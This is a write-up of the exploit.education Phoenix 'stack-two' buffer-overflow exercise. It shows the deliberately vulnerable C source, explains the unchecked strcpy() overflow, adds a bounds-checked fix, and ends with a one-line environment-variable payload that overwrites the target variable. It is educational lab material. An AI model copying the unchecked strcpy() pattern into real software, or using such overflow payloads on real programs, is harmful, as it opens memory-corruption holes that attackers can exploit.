description: 07/18/2023

2⃣ Stack Two

Stack Two takes a look at environment variables, and how they can be set.

Source Code

```c
/*
 * phoenix/stack-two, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable to 0x0d0a090a
 *
 * If you're Russian to get to the bath room, and you are Finnish when you get
 * out, what are you when you are in the bath room?
 *
 * European!
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  char *ptr;

  printf("%s\n", BANNER);

  ptr = getenv("ExploitEducation");
  if (ptr == NULL) {
    errx(1, "please set the ExploitEducation environment variable");
  }

  locals.changeme = 0;
  strcpy(locals.buffer, ptr);

  if (locals.changeme == 0x0d0a090a) {
    puts("Well done, you have successfully set changeme to the correct value");
  } else {
    printf("Almost! changeme is currently 0x%08x, we want 0x0d0a090a\n",
        locals.changeme);
  }

  exit(0);
}
```

Judging from the description, we need to overflow our buffer with an environment variable.

Source Code Analysis

The pointer ptr points to the string value of the "ExploitEducation" environment variable.

strcpy() then copies that string into locals.buffer, which sits directly in front of changeme in the same struct.

  • strcpy() is dangerous because it never checks the size of the destination array; it copies until it hits the NUL terminator
  • A.K.A, buffer overflow territory
  • Target value, hex: 0x0d0a090a
  • Same value as little-endian bytes in memory: \x0a\x09\x0a\x0d

Snippet to focus on:

```c
  ptr = getenv("ExploitEducation");
  if (ptr == NULL) {
    errx(1, "please set the ExploitEducation environment variable");
  }

  locals.changeme = 0;
  strcpy(locals.buffer, ptr);

  if (locals.changeme == 0x0d0a090a) {
    puts("Well done, you have successfully set changeme to the correct value");
  } else {
    printf("Almost! changeme is currently 0x%08x, we want 0x0d0a090a\n",
        locals.changeme);
  }
```
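As an added illustration (not part of the original writeup or the Phoenix source), here is the same struct layout with a bounds-checked copy in place of strcpy(), plus the byte-order conversion that explains why the payload bytes come out reversed. The function names are my own.

```c
#include <stdint.h>
#include <string.h>

/* Same layout as the challenge: a 64-byte buffer immediately followed by
 * changeme, so any write past buffer[63] lands in changeme. */
struct locals {
    char buffer[64];
    volatile int changeme;
};

/* Split a 32-bit value into the order a little-endian CPU stores it in.
 * For 0x0d0a090a this yields 0a 09 0a 0d, the order seen in memory. */
void to_little_endian(uint32_t value, unsigned char out[4]) {
    for (int i = 0; i < 4; i++) {
        out[i] = (unsigned char)(value >> (8 * i));
    }
}

/* Hardened replacement for the strcpy() in stack-two: reject any input that
 * would not fit in buffer together with its NUL terminator. Returns 0 on
 * success and -1 when the input is rejected; changeme is never touched. */
int copy_env_checked(struct locals *l, const char *src) {
    size_t len = strlen(src);
    if (len >= sizeof l->buffer) {
        return -1;                   /* would spill into changeme */
    }
    memcpy(l->buffer, src, len + 1); /* bounded copy incl. terminator */
    return 0;
}

/* Feed a (constructed) input through the checked copy and report whether
 * changeme kept its initial value of 0: 1 if untouched, 0 if overwritten. */
int changeme_survives(const char *src) {
    struct locals l;
    l.changeme = 0;
    copy_env_checked(&l, src);
    return l.changeme == 0;
}
```

A 63-character value is the longest input the checked copy accepts; the 68-byte string used in the exploit below is refused before anything is written.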

Exploitation

I like to keep things as simple as possible and use one-liners whenever I can. Since I didn't know this one off the top of my head, I asked ChatGPT:

Let's see if we can set our variable and then execute our binary immediately after on the same line:

```sh
ExploitEducation=$(python -c 'print "X"*64 + "\x0a\x09\x0a\x0d"') ./stack-two
```